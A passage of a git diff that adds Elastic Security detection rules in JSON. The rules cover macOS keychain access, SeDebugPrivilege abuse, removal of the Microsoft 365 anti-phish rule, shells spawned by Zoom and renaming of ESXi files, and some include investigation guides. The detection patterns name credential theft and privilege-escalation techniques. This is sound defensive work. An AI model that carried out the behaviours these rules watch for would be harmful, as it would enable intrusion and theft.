\"/Applications/OpenVPN Connect/OpenVPN Connect.app/Contents/MacOS/OpenVPN Connect\",\n \"/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise\",\n \"/opt/jc/bin/jumpcloud-agent\"\n ) and\n not process.executable : \"/opt/jc/bin/jumpcloud-agent\"\n", + "references": [ + "https://objective-see.com/blog/blog_0x25.html", + "https://securelist.com/calisto-trojan-for-macos/86543/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "96e90768-c3b7-4df6-b5d9-6237f8bc36a8", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.001", + "name": "Keychain", + "reference": "https://attack.mitre.org/techniques/T1555/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "96e90768-c3b7-4df6-b5d9-6237f8bc36a8_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_7.json b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_7.json new file mode 100644 index 00000000000..ca89d14b9df --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_7.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a process running as SYSTEM and impersonating a Windows core binary privileges. Adversaries may create a new process with a different token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SeDebugPrivilege Enabled by a Suspicious Process", + "query": "any where host.os.type == \"windows\" and event.provider: \"Microsoft-Windows-Security-Auditing\" and\n event.action : \"Token Right Adjusted Events\" and\n\n winlog.event_data.EnabledPrivilegeList : \"SeDebugPrivilege\" and\n\n /* exclude processes with System Integrity */\n not winlog.event_data.SubjectUserSid : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n\n not winlog.event_data.ProcessName :\n (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\WinSxS\\\\*\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\MRT.exe\",\n \"?:\\\\Windows\\\\System32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostw.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*-*\\\\DismHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\auditpol.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSe.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSe.exe\")\n", + "references": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4703", + "https://blog.palantir.com/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.EnabledPrivilegeList", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ProcessName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97020e61-e591-4191-8a3b-2861a2b887cd", + "setup": "## Setup\n\nWindows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDetailed Tracking >\nToken Right Adjusted Events (Success)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "97020e61-e591-4191-8a3b-2861a2b887cd_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_103.json b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_103.json new file mode 100644 index 00000000000..3a39a12b625 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_103.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks.", + "false_positives": [ + "An anti-phishing rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Anti-Phish Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-AntiPhishRule\" or \"Disable-AntiPhishRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-antiphishrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97314185-2568-4561-ae81-f3e480e5e695", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "97314185-2568-4561-ae81-f3e480e5e695_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_105.json b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_105.json new file mode 100644 index 00000000000..8c07de0084e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_105.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks.", + "false_positives": [ + "An anti-phishing rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Anti-Phish Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-AntiPhishRule\" or \"Disable-AntiPhishRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-antiphishrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97314185-2568-4561-ae81-f3e480e5e695", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "97314185-2568-4561-ae81-f3e480e5e695_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_206.json b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_206.json new file mode 100644 index 00000000000..b732e987c0a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_206.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks.", + "false_positives": [ + "An anti-phishing rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Anti-Phish Rule Modification", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-AntiPhishRule\" or \"Disable-AntiPhishRule\") and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-antiphishrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97314185-2568-4561-ae81-f3e480e5e695", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "97314185-2568-4561-ae81-f3e480e5e695_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_109.json b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_109.json new file mode 100644 index 00000000000..f435cfdf3fd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_109.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious Zoom child process was detected, which may indicate an attempt to run unnoticed. Verify process details such as command line, network connections, file writes and associated file signature details as well.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Zoom Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"Zoom.exe\" and process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97aba1ef-6034-4bd3-8c1a-1e0996b27afa", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + }, + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "97aba1ef-6034-4bd3-8c1a-1e0996b27afa_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_110.json b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_110.json new file mode 100644 index 00000000000..8898e862d3c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_110.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious Zoom child process was detected, which may indicate an attempt to run unnoticed. Verify process details such as command line, network connections, file writes and associated file signature details as well.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Zoom Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"Zoom.exe\" and process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97aba1ef-6034-4bd3-8c1a-1e0996b27afa", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + }, + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "97aba1ef-6034-4bd3-8c1a-1e0996b27afa_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_6.json b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_6.json new file mode 100644 index 00000000000..1c76b43beed --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_6.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where VMware-related files, such as those with extensions like \".vmdk\", \".vmx\", \".vmxf\", \".vmsd\", \".vmsn\", \".vswp\", \".vmss\", \".nvram\", and \".vmem\", are renamed on a Linux system. The rule monitors for the \"rename\" event action associated with these file types, which could indicate malicious activity.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Renaming of ESXI Files", + "query": "file where host.os.type == \"linux\" and event.action == \"rename\" and\nfile.Ext.original.name : (\"*.vmdk\", \"*.vmx\", \"*.vmxf\", \"*.vmsd\", \"*.vmsn\", \"*.vswp\", \"*.vmss\", \"*.nvram\", \"*.vmem\")\nand not file.name : (\"*.vmdk\", \"*.vmx\", \"*.vmxf\", \"*.vmsd\", \"*.vmsn\", \"*.vswp\", \"*.vmss\", \"*.nvram\", \"*.vmem\")\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.original.name", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97db8b42-69d8-4bf3-9fd4-c69a1d895d68", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud 